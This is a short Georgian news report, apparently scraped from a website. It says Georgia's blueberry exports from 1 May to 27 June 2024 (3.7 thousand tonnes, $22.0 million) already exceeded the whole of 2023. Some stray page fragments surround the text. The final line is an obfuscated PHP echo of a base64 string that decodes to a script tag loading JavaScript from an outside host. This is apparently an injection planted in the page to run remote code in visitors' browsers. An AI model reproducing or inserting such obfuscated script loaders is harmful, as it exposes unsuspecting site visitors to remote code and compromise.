celsiusi
ავერსი შნაიდერი

 მოცვის ექსპორტის მაჩვენებელმა 2024 წლის 27 ივნისისთვის უკვე გადააჭარბა წინა წლის ექსპორტის სრულ მაჩვენებელს.

კერძოდ, სოფლის მეურნეობის სამინისტროს ინფორმაციით, 2024 წლის 1 მაისიდან 2024 წლის 27 ივნისის ჩათვლით, საქართველოდან 3.7 ათასი ტონა მოცვის ექსპორტი განხორციელდა, მაშინ როცა, გასული წლის მოცვის ექსპორტის სრულმა მაჩვენებელმა 3.4 ათას ტონა შეადგინა.

2024 წლის 1 მაისიდან 2024 წლის 27 ივნისის ჩათვლით, საქართველოდან ექსპორტირებული მოცვის ღირებულება 22.0 მლნ აშშ დოლარია. 2023 წლის ანალოგიურ პერიოდთან შედარებით, ექსპორტირებული მოცვის მოცულობა 2.4 ათასი ტონით (2.9-ჯერ), ხოლო ღირებულება - 13.8 მლნ აშშ დოლარით (2.7-ჯერ) გაიზარდა.

149
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");